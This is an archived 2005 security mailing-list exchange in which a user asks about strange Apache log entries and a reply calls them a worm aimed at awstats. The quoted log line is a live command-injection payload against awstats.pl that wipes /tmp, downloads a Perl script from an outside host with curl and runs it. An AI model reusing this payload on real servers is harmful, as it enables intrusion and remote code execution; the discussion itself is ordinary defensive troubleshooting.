Re: GET //awstats.pl? in apache logs

From: Andreas Constantinides (MegaHz) (megahz_at_megahz.org)
Date: 10/24/05

  • Next message: highwaycode_at_securityfocus.com,: "Re: GET //awstats.pl? in apache logs"
    To: "Konstantine" <listclient@gmail.com>, <security-basics@securityfocus.com>
    Date: Mon, 24 Oct 2005 16:29:45 +0300
    
    

    well just a worm
    if u dont have awstats, no need to worry

    -- Andreas

    ----- Original Message -----
    From: "Konstantine" <listclient@gmail.com>
    To: <security-basics@securityfocus.com>
    Sent: Saturday, October 22, 2005 12:33 AM
    Subject: GET //awstats.pl? in apache logs

    > My apache logs show rows after rows of following, all from various IP
    > addresses. This started a couple of days ago. I don't have awstats.
    > Could somebody tell me what is that? Is there anything I should be
    > doing? thanks.K.
    > GET
    > //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo|
    > HTTP/1.1


  • Next message: highwaycode_at_securityfocus.com,: "Re: GET //awstats.pl? in apache logs"

    Relevant Pages

    • Re: Apache Log Munging
      ... > Are there any Rails projects, or Ruby libraries for Apache logs? ... Dunno. ... I do have a non-blocking multithreaded DNS resolver for apache logs ... It is plenty zippy and I use it to merge log files for awstats to chew ...
      (comp.lang.ruby)
    • Re: apache log parsing
      ... -- There exist some apps to make statistics from apache logs, ... -- e.g. awstats, analog, Webalizer and more. ...
      (perl.beginners)
    • RE: parsing Apache logs
      ... awstats. ... > Subject: parsing Apache logs ... > I seem to remember there being a Debian package that allowed ... > one to parse and view Apache logs via the web. ...
      (Debian-User)

  • Quantcast